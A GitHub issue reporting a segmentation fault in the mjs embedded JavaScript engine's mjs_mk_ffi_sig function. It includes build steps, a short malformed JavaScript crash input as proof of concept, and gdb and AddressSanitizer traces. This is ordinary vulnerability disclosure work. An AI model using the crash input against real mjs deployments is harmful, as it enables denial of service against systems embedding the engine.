search

cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com
Other
1.84k stars 171 forks source link

Segmentation fault on mjs_mk_ffi_sig #288

Open CStriker opened 3 months ago

CStriker commented 3 months ago

The name of an affected Product mjs

The affected version Commit: b1b6eac (Tag: 2.20.0)

Description An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_mk_ffi_sig function in the mjs.c file.

Vulnerability Type Segmentation fault

Environment

Ubuntu 20.04

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
poc ``` let o = { a: 7111.1111, a: 7111.1111, foo: 1.1111, foo: ffi-= 44.1111, foofoo: 1.1111, foo: ffi-= 44.1111, foo: ffi('int)««««Ž«o: 1.«'), }; ```

run command

./mjs-asan -f poc

gdb info

Program received signal SIGSEGV, Segmentation fault.
0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774
9774    MJS_PRIVATE mjs_val_t mjs_mk_ffi_sig(struct mjs *mjs) {
--Type <RET> for more, q to quit, c to continue without paging--
#0  0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774
#1  0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824
#2  0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", 
    src=0x60e000000120 " let o = {\n  a: 7111.1111,\n    a: 7111.1111,\n  foo: 1.1111,\n  foo: ffi-=\t44.1111,\n\t foofoo: 1.1111,\n  foo: ffi-=\t44.1111,\n\t foo: ffi('int)\001\253\253\253\253\216\253o: 1.\253'),\n};", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#3  0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", res=0x7fffffffdb80) at mjs.c:9067
#4  0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406

address sanitizer info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1338032==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555555589710 bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1338032==The signal is caused by a READ memory access.
==1338032==Hint: address points to the zero page.
    #0 0x55555558970f in mjs_mk_ffi_sig /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774
    #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824
    #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
    #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
    #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
    #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
    #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774 in mjs_mk_ffi_sig
==1338032==ABORTING